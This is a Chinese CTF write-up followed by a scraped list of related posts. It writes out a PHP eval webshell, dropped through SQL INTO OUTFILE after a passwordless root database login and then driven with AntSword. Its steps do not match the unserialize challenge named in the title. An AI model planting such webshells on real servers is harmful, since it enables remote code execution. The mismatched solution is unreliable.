CTF Web_php_unserialize 详细解题过程
打开靶场地址,我们看到是一个php代码
我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件
扫描可以得出该网站下的文件,我将它复制在记事本中
发现一个数据库网站
获取到账号为root密码为空
登录数据库,在SQL出编写一句话木马,并执行。
SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'
接下来我们使用中国蚁剑,链接我们所编写的木马,
SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'
//红色字体为链接密码,绿色字体为木马文件路径。
链接成功后,我们可以直接在蚁剑中,查看该数据库中的文件,发现flag
第二种方法:
根据题目源代码可知 过滤了 php:// 大小写绕过呗
构造 payload,抓包
在数据包中添加一个PHP的函数
然后cat flag那个文件,查看内容:
拿到flg............
CTF Web_php_unserialize 详细解题过程相关推荐
- 攻防世界warmup新人小白友好向详细解题过程
攻防世界warmup新人小白详细解题过程 思路:查看网页源码发现提示信息,/source.php 进行代码审计 ,主要函数找出,PHP函数记住,自己构造PAYLOAD 声明:菜菜级的水平,解析有错的不 ...
- 某次 ctf Mobile 0x01 解题过程
文章目录 题目 一.解题过程及代码分析 代码分析 Judge() 函数分析 b.a() 函数分析及还原 b.b() 函数分析: a.a() 函数分析 a.a()混淆函数还原 总结 前言:同学发来了一个 ...
- CTF 关于ZIP解题过程
CTF 关于ZIP解题 1.伪加密类型 打开之后是两张图片,一张未加密,一张已加密. 利用WinHex打开 然后在谷歌上找到大佬关于zip格式的介绍 接下来进行对比,看是否属于伪加密 通过对比,发现确 ...
- 第三届长安杯解析(2次修订版)镜像+具体解析+个人详细解题过程,涉及多个模块,我会努力把所有写好,可以做一下题目,提升很明显。
第一次写的太烂了,看到其他大佬写的我很羞愧,所以努力修订. 长安杯链接: 链接:https://pan.baidu.com/s/1PIJpKRpn5H94_bxbOJIO0w?pwd=ybww 提取码 ...
- 逆向查找_CTFer成长之路--一道数独逆向题目解题过程(算法分析、查找线索)...
前言 CTF 是实战性很强的赛事.仅学习理论知识,不进行实操,永远无法成为 CTF 大神.本次博客为大家解读一道数独相关的逆向,讲解解题过程,总结知识点(CTF中的套路). 题目介绍 本次选择的是出自 ...
- CTF学习-密码学解题思路
CTF学习-密码学解题思路 密码学持续更新 密码学概述 密码学的发展 第一个阶段是从古代到19世纪末-古典密码 (classical cryptography) 第二个阶段从20世纪初到1949年-近 ...
- CTF学习-逆向解题思路
CTF学习-逆向解题思路 持续更新 一.通用过程 通过file命令查看文件类型,判断是ELF还是PE,32位还是64位. 通过strings并重定向标准输出,然后搜索大括号 { ,看看是否能直接得到f ...
- 猿人学12题超详细解题思路-入门级js(base64编码)
前言:服务器为了防止获取他们的数据,可谓是使用各种方法,js逆向可以很方便的解析出来一些加密数据,毕竟道高一尺魔高一丈,今天告诉大家袁人学第12题的解题思路,超详细解题思路. 需求: ...
- CTFer成长之路--一道历届逆向题解题过程(包含脱壳、算法分析)
前言 CTF 是实战性很强的赛事.仅学习理论知识,不进行实操,永远无法成为 CTF 大神.从本篇博客开始,我将选择有代表性的历年CTF比赛题目,介绍解题过程,工具使用以及讲解知识点. 题目介绍 本次讲 ...
- (转载)连连看游戏外挂详细制作过程
标 题: [原创]新人入手第一个游戏外挂,附上详细制作过程 作 者: caigui 时 间: 2013-01-09,00:56:16 链 接: http://bbs.pediy.com/showthr ...
最新文章
- GPT-3到来,程序员会被AI取代吗?
- oracle自动冷备份脚本
- CallContext和多线程
- java国际化——日期和时间+排序
- 拆解嘀嗒出行赴港IPO招股书:顺风车市占率近七成 2019年起实现盈利
- 常用数据挖掘算法举例(上)
- 编写程序,用户输入一个位以上的整数,输出其百位以上的数字。例如用户输入1234.则程序输出12.
- AC日记——Flag Codeforces 16a
- 从键盘输入5个学生每科分数,把分数保存到一个数组中,最后输出分数大于60分的成绩
- SQL:数据库更新语句操作实例
- 解决vmrc的连接已断开,正在尝试重新连接
- torch.nn.Module.named_parameters(prefix=‘‘, recurse=True)
- 电脑加域、exchange邮箱设置、绑定打印机
- 【001】快乐数字解题过程记录
- java计算机毕业设计教师管理系统源码+mysql数据库+系统+lw文档+部署
- Word在试图打开文件时遇到错误。 请尝试下列方法: 检查文档或驱动器的文件权限。 确保有足够的内存和磁盘空间。 用文本恢复转换器打开文件。
- IDEA 导入外来jar包并生效(同 Eclipse 中 buid path 效果)
- ppt中如何输入四线三格字体
- matlab如何与ccs关联,CCS与Matlab
- ios浏览器日期不生效